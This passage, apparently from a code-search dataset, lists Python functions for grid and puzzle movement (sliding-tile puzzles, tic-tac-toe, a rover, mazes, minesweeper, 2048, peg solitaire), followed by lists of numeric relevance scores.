-= 1\r\n elif direction == \"r\":\r\n assert zero_col < self._width - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\r\n self._grid[zero_row][zero_col + 1] = 0\r\n zero_col += 1\r\n elif direction == \"u\":\r\n assert zero_row > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\r\n self._grid[zero_row - 1][zero_col] = 0\r\n zero_row -= 1\r\n elif direction == \"d\":\r\n assert zero_row < self._height 
- 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\r\n self._grid[zero_row + 1][zero_col] = 0\r\n zero_row += 1\r\n else:\r\n assert False, \"invalid direction: \" + direction", "def update_puzzle(self, move_string):\r\n zero_row, zero_col = self.current_position(0, 0)\r\n for direction in move_string:\r\n if direction == \"l\":\r\n assert zero_col > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\r\n self._grid[zero_row][zero_col - 1] = 0\r\n zero_col -= 1\r\n elif direction == \"r\":\r\n assert zero_col < self._width - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\r\n self._grid[zero_row][zero_col + 1] = 0\r\n zero_col += 1\r\n elif direction == \"u\":\r\n assert zero_row > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\r\n self._grid[zero_row - 1][zero_col] = 0\r\n zero_row -= 1\r\n elif direction == \"d\":\r\n assert zero_row < self._height - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\r\n self._grid[zero_row + 1][zero_col] = 0\r\n zero_row += 1\r\n else:\r\n assert False, \"invalid direction: \" + direction", "def update_puzzle(self, move_string):\r\n zero_row, zero_col = self.current_position(0, 0)\r\n for direction in move_string:\r\n if direction == \"l\":\r\n assert zero_col > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\r\n self._grid[zero_row][zero_col - 1] = 0\r\n zero_col -= 1\r\n elif direction == \"r\":\r\n assert zero_col < self._width - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\r\n self._grid[zero_row][zero_col + 1] = 0\r\n zero_col += 1\r\n elif direction == \"u\":\r\n assert zero_row > 0, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\r\n self._grid[zero_row - 1][zero_col] = 0\r\n zero_row -= 1\r\n elif direction == \"d\":\r\n assert zero_row < self._height - 1, \"move off grid: \" + direction\r\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\r\n self._grid[zero_row + 1][zero_col] = 0\r\n zero_row += 1\r\n else:\r\n assert False, \"invalid direction: \" + direction", "def move(self):\n \n self.position = self.explore()", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col\n - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col\n + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][\n 
zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][\n zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction", "def move_agent(self, state):\n m = self.m\n n = self.n\n\n cur_env = deepcopy(state.grid)\n cur_env[m, n] = 0\n action = self.choose_action(state)\n\n if action == 'Right':\n if n + 1 >= grid_size or cur_env[m][n+1] != 0:\n Rew = -2 # Reward -5 if we move into wall or another agent\n self.collisions += 1\n else:\n n += 1\n Rew = -0.1 # Reward -1 otherwise\n a = 0 # Action number\n elif action == 'Left':\n if n - 1 < 0 or cur_env[m][n-1] != 0:\n Rew = -2\n self.collisions += 1\n else:\n n -= 1\n Rew = -0.1\n a = 1\n elif action == 'Up':\n if m - 1 < 0 or cur_env[m-1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m -= 1\n Rew = -0.1\n a = 2\n elif action == 'Down':\n if m + 1 >= grid_size or cur_env[m+1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m += 1\n Rew = -0.1\n a = 3\n\n m = m % grid_size\n n = n % grid_size\n self.m = m # Update position of agent\n self.n = n # Update position of agent\n cur_env[m][n] = 1 # Update grid\n new_state = State(cur_env, [m, n]) # Set new state\n terminal = False\n\n if [m, n] == self.end:\n Rew = 10\n terminal = True\n self.carry = True\n\n return new_state, a, Rew, terminal", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction\n for row in self._grid:\n print row\n print", "def _coordinate_after_moving(self, direction, coordinate):\n\n if direction == 'N':\n new_coordinate = Coordinate(coordinate.x, coordinate.y + 1)\n elif direction == 'S':\n new_coordinate = Coordinate(coordinate.x, coordinate.y - 1)\n elif direction == 'W':\n new_coordinate = Coordinate(coordinate.x - 1, coordinate.y)\n else:\n new_coordinate = Coordinate(coordinate.x + 1, coordinate.y)\n\n if not self._is_coordinate_in_the_grid(new_coordinate):\n raise RoverException(ExceptionMessages.OFF_GRID)\n\n if self._is_coordinate_occupied(new_coordinate):\n raise RoverException(ExceptionMessages.ROVER_COLLISION)\n\n return new_coordinate", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\n self._grid[zero_row][zero_col - 1] = 0\n 
zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction", "def update_puzzle(self, move_string):\n zero_row, zero_col = self.current_position(0, 0)\n for direction in move_string:\n if direction == \"l\":\n assert zero_col > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col - 1]\n self._grid[zero_row][zero_col - 1] = 0\n zero_col -= 1\n elif direction == \"r\":\n assert zero_col < self._width - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row][zero_col + 1]\n self._grid[zero_row][zero_col + 1] = 0\n zero_col += 1\n elif direction == \"u\":\n assert zero_row > 0, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row - 1][zero_col]\n self._grid[zero_row - 1][zero_col] = 0\n zero_row -= 1\n elif direction == \"d\":\n assert zero_row < self._height - 1, \"move off grid: \" + direction\n self._grid[zero_row][zero_col] = self._grid[zero_row + 1][zero_col]\n self._grid[zero_row + 1][zero_col] = 0\n zero_row += 1\n else:\n assert False, \"invalid direction: \" + direction", "def Recharge_Method3(r, c):\n if state.loc[r] != state.pos[c] and state.pos[c] != r:\n if state.pos[c] in rv.LOCATIONS:\n alg.do_task('moveTo', r, state.pos[c])\n else:\n robot = state.pos[c]\n alg.do_command(put, robot, c)\n alg.do_task('moveTo', r, state.pos[c])\n alg.do_command(charge, r, c)\n alg.do_command(take, r, c)", "def move(self, cardinal, maze):\n\n adjacent_room = getattr(self.location, cardinal)\n\n if not adjacent_room:\n out = f\"You cannot go {cardinal} from here.\"\n else:\n adjacent_room.data[\"players\"][self.name] = \\\n self.location.data[\"players\"].pop(self.name)\n\n adjacent_room.players[self.name] = \\\n self.location.players.pop(self.name)\n\n maze[self.location.x][self.location.y] = MazeFactory.room_color\n self.location = adjacent_room\n maze[self.location.x][self.location.y] = MazeFactory.player_color\n\n out = \"You have entered \" + self.location.description\n MazeFactory.update(maze)\n return out", "def test_move(self):\n for row in range(self.game._dim):\n for col in range(self.game._dim):\n self.game.move(row, col, PLAYERX)\n self.assertEqual(self.game.get_square(row, col), PLAYERX)\n\n for row in range(self.game._dim):\n for col in range(self.game._dim):\n self.game.move(row, col, PLAYERO)\n self.assertEqual(self.game.get_square(row, col), PLAYERX)\n self.game._board[row][col] = PLAYERO\n self.game.move(row, col, PLAYERO)\n self.assertEqual(self.game.get_square(row, col), PLAYERO)", "def move(): #py:move\n RUR._move_()", "def move(self, row, col, player):", "def move_to_position1(self):", "def determineNextMove(player_location, opponentLocation, coins):\n global route, currentcoin, meta_route, best_weight, best_path, coins_to_search, index\n if opponentLocation in coins_to_search:\n coins_to_search, 
meta_route, route = change_way(coins, opponentLocation, player_location)[:3]\n index = 0\n elif currentcoin == player_location: \n if len(route) != 0:\n old_dist = algo.dijkstra(mazeMap, player_location)[1][meta_route[index+1]]\n coins_to_search2, meta_route2, route2, new_dist = change_way(coins, opponentLocation, player_location)\n\n #dist_matrix, route_matrix = u.update_dists_from_each(dists_matrix, routes_matrix, player_location, mazeMap, coins)\n #coins_to_search = get_n_shortest(3, coins, player_location, dists_matrix)\n \t\n #ennemy_dists = algo.dijkstra(mazeMap, opponentLocation)\n #for c in coins_to_search:\n #if len(coins_to_search) >= 2 and ennemy_dists[1][c] < dists_matrix[player_location][c]:\n # coins_to_search.remove(c)\n #break\n \t\t\n #best_weight = float(\"inf\")\n #best_path = []\n #exhaustive(coins_to_search, player_location, [], 0, dist_matrix)\n #meta_route2 = [player_location] + best_path\n #route2 = u.location_list_to_route(meta_route2, route_matrix)\n #new_dist = dist_matrix[player_location][meta_route2[1]]\n\t\t\n if len(route) == 0 or old_dist - new_dist > 3:\n route = route2\n meta_route = meta_route2 \n index = 0\n index += 1\n currentcoin = meta_route[index]\n #api.debug(route)\n return u.direction(player_location, route.pop(0))", "def test_maze_move_6(self):\n maze_template = [['#', '#', '#', '#', '#', '#', '#'], \n ['#', '.', '.', '.', '.', '.', '#'], \n ['#', '.', '#', '#', '#', '.', '#'], \n ['#', '.', '.', '@', '#', '.', '#'], \n ['#', '@', '#', '.', '@', '.', '#'], \n ['#', '#', '#', '#', '#', '#', '#']]\n rat_J = a2.Rat(a2.RAT_1_CHAR, 1, 1)\n rat_P = a2.Rat(a2.RAT_2_CHAR, 1, 4)\n\n maze = a2.Maze(maze_template, rat_J, rat_P)\n old_sprout_count = maze.num_sprouts_left\n\n maze.move(rat_J, a2.DOWN, a2.NO_CHANGE)\n\n self.assertEqual(maze.num_sprouts_left, old_sprout_count)", "def execute_move(move, game, view):\n tokens = move.split()\n\n if len(tokens) > 0:\n command = tokens[0].lower()\n\n if command == \"flag\":\n # Flag commands are expected to be in the format\n # 'flag <column> <row>'\n if len(tokens) == 3:\n try:\n col = int(tokens[1])\n row = int(tokens[2])\n\n game.flag_cell(row, col)\n except ValueError:\n view.invalid_flag_command()\n else:\n view.invalid_flag_command()\n\n elif command == \"uncover\":\n # Uncover commands are expected to be in the format\n # 'uncover <column> <row>'\n if len(tokens) == 3:\n try:\n col = int(tokens[1])\n row = int(tokens[2])\n\n game.uncover_cell(row, col)\n except ValueError:\n view.invalid_uncover_command()\n else:\n view.invalid_uncover_command()\n\n elif command == \"help\":\n view.general_help_message()\n elif command == \"quit\":\n sys.exit()\n else:\n # Unrecognised command\n view.invalid_move()\n else:\n view.invalid_move()", "def solveOneStep(self):\n ### Student code goes here\n # Mark this move as explored\n self.visited[self.currentState] = True\n\n # Get move to make\n movables = self.gm.getMovables()\n # print(\"EXPLORING GAME STATE \" + str(self.gm.getGameState()) + \"---------------------------------------------------------\")\n to_move = self.currentState.nextChildToVisit # movables index\n # print(\"depth \", self.currentState.depth)\n\n # Return if done\n if self.currentState.state == self.victoryCondition:\n # print(\"DONE\")\n return True\n\n while to_move < len(movables):\n # Make the move\n movable_statement = movables[to_move]\n # print(\"implementing move \", movable_statement)\n self.gm.makeMove(movable_statement)\n\n # Create a new state with this move made\n new_state = 
self.gm.getGameState()\n\n # Find out if this state has already been explored\n visited = False\n for visited_state in self.visited.keys():\n if visited_state.state == new_state:\n visited = True\n\n # If the new state hasn't been visited then add it as a child then move down to this child\n if not visited:\n new_gs = GameState(new_state, self.currentState.depth + 1, movable_statement)\n new_gs.parent = self.currentState\n self.currentState.children.append(new_gs)\n self.currentState.nextChildToVisit = to_move + 1\n self.currentState = new_gs\n break\n\n # Else skip this state and try going to the next movable statement\n else:\n # print(\"SKIP THIS STATE\")\n self.gm.reverseMove(movable_statement)\n to_move += 1\n\n # Went all the way down to a leaf, backtrack\n if (to_move >= len(movables)):\n self.gm.reverseMove(self.currentState.requiredMovable)\n self.currentState = self.currentState.parent\n\n return False", "def solve_2x2(self):\r\n # replace with your code\r\n assert self.row1_invariant(1), '2x2 Dont pass row1_invariant(1)'\r\n whole_move = ''\r\n current_position = self.current_position(0, 0)\r\n # print 'Zero position =', current_position\r\n counter = 0\r\n \r\n\r\n \r\n # if current_position == (0,0):\r\n # print (0,0)\r\n # move_to_00 = 'rdlu' \r\n if current_position == (0,1):\r\n # print (0,1)\r\n move_to_00 = 'l'\r\n if current_position == (1,0):\r\n # print (1,0)\r\n move_to_00 = 'u'\r\n if current_position == (1,1):\r\n # print (1,1)\r\n move_to_00 = 'ul'\r\n whole_move += move_to_00\r\n self.update_puzzle(move_to_00)\r\n # print self\r\n # print self.get_number(1,1) < self.get_number(1,0)\r\n \r\n while self.get_number(0,0) != 0 or self.get_number(0,1) != 1:\r\n \r\n # print 'Aloha in loop!'\r\n counter +=1\r\n move = 'rdlu'\r\n whole_move += move\r\n self.update_puzzle(move)\r\n # print self\r\n if counter >5:\r\n break\r\n return whole_move", "def move_player():\r\n global current_position #say that we want to refer to the one above!\r\n if map1[current_position[0]][current_position[1]] == 'x':\r\n print('we hit a wall!')\r\n current_position = previous_position #hit a wall so we return to the previous position\r\n else:\r\n if map1[current_position[0]][current_position[1]] == 'f': #check have we reach the flag yet\r\n map1[current_position[0]][current_position[1]] = 'p' #set new position to be the player\r\n map1[previous_position[0]][previous_position[1]] = ' ' #set previous position to be empty space\r\n print('we maade it!')\r\n return True\r\n map1[current_position[0]][current_position[1]] = 'p' #move the player to the next position\r\n map1[previous_position[0]][previous_position[1]] = ' '", "def extensions(self):\n def swap(marker, mx, x2, my, y2):\n \"\"\"\n If proper conditions are met, jump over the peg depending on the\n condition\n @param marker: map, list of list\n @param mx: Original x coordinate\n @param x2: Replacement x coordinate\n @param my: Original y coordinate\n @param y2: Replacement y coordinate\n @return: list[list[str]]\n \"\"\"\n # creates a deep copy\n # each if statement checks whether to move the piece N S E W by\n # comparing the current coordinates and the new coordinates\n map = [x[:] for x in marker]\n map[my][mx], map[y2][x2] = map[y2][x2], map[my][mx]\n if my < y2:\n map[my+1][mx] = \".\"\n elif my > y2:\n map[my-1][mx] = \".\"\n elif mx < x2:\n map[my][mx+1] = \".\"\n else:\n map[my][mx-1] = \".\"\n return map\n\n def legal_move(marker, x, y, direction):\n \"\"\"\n Checks if there is a potential move at the direction of\".\"\n 
coordinate\n @param marker: map of the board\n @param x: x coordinate\n @param y: y coordinate\n @param direction : North South East West of the \".\"\n @return: boolean\n \"\"\"\n # first if statement determines the directions\n # second if statement checks if the \"potential move\" is within the index\n if direction == \"N\":\n if 0 <= y-2 < len(marker):\n return marker[y-2][x] == marker[y-1][x] == '*'\n if direction == \"S\":\n if 0 <= y+2 < len(marker):\n return marker[y+2][x] == marker[y+1][x] == '*'\n if direction == \"W\":\n if 0 <= x-2 < len(marker[0]):\n return marker[y][x-2] == marker[y][x-1] == '*'\n if direction == \"E\":\n if 0 <= x+2 < len(marker[0]):\n return marker[y][x+2] == marker[y][x+1] == '*'\n return False\n\n combos = []\n # For loops go through the coordinates\n # each if statement checks and appends the new scenario\n # iff there is a legal move available\n for y in range(len(self._marker)):\n for x in range(len(self._marker[0])):\n if self._marker[y][x] == '.':\n if legal_move(self._marker, x, y, 'N'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x, y, y-2), self._marker_set))\n if legal_move(self._marker, x, y, 'S'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x, y, y+2), self._marker_set))\n if legal_move(self._marker, x, y, 'W'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x-2, y, y), self._marker_set))\n if legal_move(self._marker, x, y, 'E'):\n combos.append(GridPegSolitairePuzzle(swap(self._marker,\n x, x+2, y, y), self._marker_set))\n return combos", "def move(self, row, column, symbol):\n game_state = self.determine_game_state()\n if game_state not in (GameState.GAME_NOT_STARTED, GameState.GAME_IN_PROGRESS):\n return MoveResults.MOVE_INVALID\n\n # check for initial move\n if self.board == BLANK_BOARD and symbol == O_SYMBOL:\n return MoveResults.MOVE_INVALID\n\n # check for invalid row and column\n if row < 0 or row > 2 or column < 0 or column > 2:\n return MoveResults.MOVE_INVALID\n\n # make sure the game piece is valid\n if symbol != X_SYMBOL and symbol != O_SYMBOL:\n return MoveResults.MOVE_INVALID\n\n # make sure the game piece isn't moving out of turn\n x_moves = self.board.count(X_SYMBOL)\n o_moves = self.board.count(O_SYMBOL)\n if symbol == X_SYMBOL and x_moves > o_moves:\n return MoveResults.MOVE_INVALID\n elif symbol == O_SYMBOL and o_moves >= x_moves:\n # note that x always goes first.\n return MoveResults.MOVE_INVALID \n\n # figure out position.\n position = (3 * row) + column\n\n # make sure there's not already a piece there.\n if self.board[position] != EMPTY_SYMBOL:\n return MoveResults.MOVE_INVALID\n\n self.board = self.board[:position] + symbol + self.board[position+1:] \n return MoveResults.MOVE_VALID", "def move(self, direction):\r\n # replace with your code\r\n row_dir = OFFSETS[direction][0]\r\n col_dir = OFFSETS[direction][1]\r\n \r\n if row_dir == 0:\r\n new_cells = self._cells\r\n new_dir = col_dir\r\n else:\r\n new_tuples = zip(*self._cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n new_dir = row_dir\r\n \r\n tmp_cells = []\r\n for lists in new_cells:\r\n lists = lists[::new_dir]\r\n merge_lists = merge(lists)\r\n tmp_cells.append(merge_lists[::new_dir])\r\n \r\n if row_dir == 0:\r\n self._cells = tmp_cells\r\n else:\r\n new_tuples = zip(*tmp_cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n self._cells = new_cells\r\n \r\n self.new_tile()", "def _walk(self):\n \n newpos= self.rect.move((self.move, 0)) # x方向移動 .move, y方向不動。\n \n # 偵測碰撞左右牆壁,並處理(反彈)\n if 
not self.area.contains(newpos):\n if self.rect.left < self.area.left or \\\n self.rect.right > self.area.right:\n self.move = -self.move\n newpos = self.rect.move((self.move, 0))\n self.image = pygame.transform.flip(self.image, 1, 0)\n self.rect = newpos", "def solve_interior_tile(self, target_row, target_col):\n \n assert target_row > 1, \"target_row cannot be in rows 0 or 1.\"\n assert self.lower_row_invariant(target_row, target_col), \"tiles to right and below incorrectly ordered\"\n \n correct_tile = self.current_position(target_row, target_col) \n move_str = self.position_tile(target_row, target_col, correct_tile) \n self.update_puzzle(move_str)\n \n assert self.lower_row_invariant(target_row, target_col - 1), \"tiles to right and below incorrectly ordered\"\n \n return move_str", "def moveable(self, board):\n # horizontal\n if self.direction == \"horizontal\":\n # the position to which the car wants to move is either 1 more or 1 less column wise\n right = self.get_cols()[1] + self.size - 1\n left = self.get_cols()[0] - 1\n # check if right or left is out of the boards margins \n if right > board.width_height:\n move_left = board.positions[self.get_rows()[0]][left]\n move_right = None\n elif left < 0:\n move_right = board.positions[self.get_rows()[0]][right]\n move_left = None\n else: \n move_right = board.positions[self.get_rows()[0]][right]\n move_left = board.positions[self.get_rows()[0]][left]\n\n # try to move left and right\n if move_right == \"x\" and move_left == \"x\":\n return \"leftright\"\n elif move_right == \"x\":\n return \"right\"\n elif move_left == \"x\":\n return \"left\"\n else: \n return \"none\"\n \n # vertical\n else:\n up = self.get_rows()[0] - 1\n #print(up)\n down = self.get_rows()[1] + self.size - 1\n # check if up or down is out of the boards margins \n if up < 0:\n # no room on the board for upward movement\n move_down = board.positions[down][self.get_cols()[0]]\n move_up = None\n elif down > board.width_height:\n # no room on the board for downward movement\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = None\n else:\n # both up and down are possible positions on the board\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = board.positions[down][self.get_cols()[0]]\n\n # try to move up and down\n if move_down == \"x\" and move_up == \"x\":\n return \"updown\"\n elif move_up == \"x\":\n return \"up\"\n elif move_down == \"x\":\n return \"down\"\n else: \n return \"none\"", "def makeMove(self, movable_statement):\n ### Student code goes here\n movingTile = movable_statement.terms[0].term.element\n oldColumn = movable_statement.terms[1].term.element\n oldRow = movable_statement.terms[2].term.element\n newColumn = movable_statement.terms[3].term.element\n newRow = movable_statement.terms[4].term.element\n\n empty = parse_input(\"fact: (empty ?x ?y)\")\n emptyFact = self.kb.kb_ask(empty).list_of_bindings[0][1][0]\n\n oldEmptyColumn = emptyFact.statement.terms[0].term.element #should equal newColumn\n oldEmptyRow = emptyFact.statement.terms[1].term.element #should equal newRow\n newEmptyRow = oldRow\n newEmptyColumn = oldColumn\n\n oldOn = parse_input(\"fact: (located \" + movingTile + \" \" + oldColumn + \" \" + oldRow + \")\")\n oldEmpty = parse_input(\"fact: (empty \" + oldEmptyColumn + \" \" + oldEmptyRow + \")\")\n newOn = parse_input(\"fact: (located \" + movingTile + \" \" + newColumn + \" \" + newRow + \")\")\n newEmpty = parse_input(\"fact: (empty \" + newEmptyColumn + \" \" + newEmptyRow + \")\")\n \n 
self.kb.kb_retract(oldOn)\n self.kb.kb_retract(oldEmpty)\n\n self.kb.kb_assert(newOn)\n self.kb.kb_assert(newEmpty)\n\n #assert all new movable statements\n # for fact in self.kb.facts:\n # if fact.statement.predicate == \"located\":\n # tile = fact.statement.terms[0].term.element\n # column = fact.statement.terms[1].term.element\n # row = fact.statement.terms[2].term.element\n\n # tileNumber = int(tile[-1])\n # columnNumber = int(column[-1])\n # rowNumber = int(row[-1])\n\n # if (columnNumber + 1 == newEmptyColumn) or (columnNumber - 1 == newEmptyColumn):\n # if (rowNumber + 1 == newEmptyRow) or (rowNumber - 1 == newEmptyRow):\n # #tile found is adjacent to empty spot so can move there\n # newMovable = parse_input(\"fact: (movable \" + tile + \" \" + columnNumber + \" \" + rowNumber + \" \" + newEmptyColumn + \" \" + newEmptyRow + \")\")\n # self.kb.kb_assert(newMovable)", "def place_pillar_i(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_i = x, y\r\n if self.pillar_i_room() == self.pillar_a_room() or \\\r\n self.pillar_i_room() == self.pillar_e_room() or \\\r\n self.pillar_i_room() == self.pillar_p_room() or \\\r\n self.pillar_i_room() == self.entrance_room() or \\\r\n self.pillar_i_room() == self.exit_room():\r\n return self.place_pillar_i()\r\n self.__maze[x][y].set_pillar_i(True)" ]
[ "0.6312876", "0.60473263", "0.5894628", "0.5894628", "0.5836864", "0.5819794", "0.581422", "0.5812412", "0.5812412", "0.58097583", "0.58019125", "0.5792342", "0.57617646", "0.5753274", "0.57401913", "0.5738901", "0.5717236", "0.5713577", "0.57098556", "0.57092357", "0.56941414", "0.5677833", "0.5670717", "0.56610096", "0.5658108", "0.56133103", "0.56106454", "0.56064165", "0.5574207", "0.55502754", "0.55494714", "0.55481696", "0.5547895", "0.5546823", "0.5546539", "0.554393", "0.55366975", "0.553581", "0.55332094", "0.55282664", "0.5521815", "0.5509873", "0.55029446", "0.5500003", "0.5490614", "0.5489107", "0.5488251", "0.5473622", "0.54735285", "0.5454175", "0.54478914", "0.5446971", "0.5437355", "0.5437117", "0.5436977", "0.5429957", "0.54284126", "0.542726", "0.54222935", "0.54182047", "0.54115635", "0.5407147", "0.54056495", "0.5402724", "0.54009223", "0.5390307", "0.5390276", "0.53887635", "0.5378361", "0.5375487", "0.5375487", "0.5375487", "0.5375278", "0.5371693", "0.53716207", "0.536728", "0.5362142", "0.53603333", "0.5360332", "0.5360332", "0.53600687", "0.53581893", "0.53549135", "0.53543276", "0.5352836", "0.5351777", "0.5351563", "0.5343986", "0.5343347", "0.5341471", "0.534042", "0.5337914", "0.533162", "0.5331182", "0.53261894", "0.53232336", "0.5317474", "0.5317473", "0.53168535", "0.5316811" ]
0.6905907
0
Basically a state machine. Given an instruction ('R' or 'L') and a direction ('N', 'S', 'E', or 'W'), returns the new direction. Throws an exception in case of a bad instruction.
def _direction_after_turning(self, direction, instruction):
    next_left_states = {'N': 'W', 'W': 'S', 'S': 'E', 'E': 'N'}
    next_right_states = {'N': 'E', 'E': 'S', 'S': 'W', 'W': 'N'}
    if instruction == 'R':
        return next_right_states[direction]
    elif instruction == 'L':
        return next_left_states[direction]
    else:
        raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)
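A minimal usage sketch of the method above, assuming stub definitions for RoverException and ExceptionMessages (both are referenced but not defined in this snippet) and a hypothetical Rover host class; the method body is copied unchanged so the sketch runs standalone:

class ExceptionMessages:
    # Stub: the real message text is not shown in the source snippet.
    INVALID_INSTRUCTION = "invalid instruction"

class RoverException(Exception):
    pass

class Rover:
    # Copied unchanged from the document above so the sketch is runnable.
    def _direction_after_turning(self, direction, instruction):
        next_left_states = {'N': 'W', 'W': 'S', 'S': 'E', 'E': 'N'}
        next_right_states = {'N': 'E', 'E': 'S', 'S': 'W', 'W': 'N'}
        if instruction == 'R':
            return next_right_states[direction]
        elif instruction == 'L':
            return next_left_states[direction]
        else:
            raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)

rover = Rover()
assert rover._direction_after_turning('N', 'R') == 'E'  # turning right from north faces east
assert rover._direction_after_turning('E', 'L') == 'N'  # turning left from east faces north
try:
    rover._direction_after_turning('N', 'X')  # anything but 'R'/'L' raises
except RoverException:
    pass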
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def go_one_step(old_state, direction):\n assert direction in ['R', 'L', 'U', 'D']\n\n x, y = old_state\n if direction == 'R':\n return (x+1, y)\n if direction == 'L':\n return (x-1, y)\n if direction == 'U':\n return (x, y+1)\n if direction == 'D':\n return (x, y-1)", "def getDirection(a):\n try:\n if (int(a) == 0): return \"N\"\n elif (int(a) == 1): return \"S\"\n elif (int(a) == 2): return \"E\"\n elif (int(a) == 3): return \"W\"\n else: raise Exception(\"Invalid Action\")\n except Exception as err:\n print(err)\n exit()", "def _get_direction(self, action, direction):\n left = [2,3,1,0]\n right = [3,2,0,1]\n if direction == 0:\n new_direction = action\n elif direction == -1:\n new_direction = left[action]\n elif direction == 1:\n new_direction = right[action]\n else:\n raise Exception(\"getDir received an unspecified case\")\n return new_direction", "def _get_state(self, state, direction):\n row_change = [-1,1,0,0]\n col_change = [0,0,-1,1]\n row_col = seq_to_col_row(state, self.num_cols)\n row_col[0,0] += row_change[direction]\n row_col[0,1] += col_change[direction]\n\n # check for invalid states\n if self.obs_states is not None:\n if (np.any(row_col < 0) or\n np.any(row_col[:,0] > self.num_rows-1) or\n np.any(row_col[:,1] > self.num_cols-1) or\n np.any(np.sum(abs(self.obs_states - row_col), 1)==0)):\n next_state = state\n else:\n next_state = row_col_to_seq(row_col, self.num_cols)[0]\n else:\n if (np.any(row_col < 0) or\n np.any(row_col[:,0] > self.num_rows-1) or\n np.any(row_col[:,1] > self.num_cols-1)):\n next_state = state\n else:\n next_state = row_col_to_seq(row_col, self.num_cols)[0]\n\n return next_state", "def get_direction(position, next_position):\n x, y = position\n next_x, next_y = next_position\n if x == next_x:\n if y < next_y:\n return constants.Action.Right\n else:\n return constants.Action.Left\n elif y == next_y:\n if x < next_x:\n return constants.Action.Down\n else:\n return constants.Action.Up\n raise constants.InvalidAction(\"We did not receive a valid position transition.\")", "def getDirectionChange(pre, now, next):\r\n return 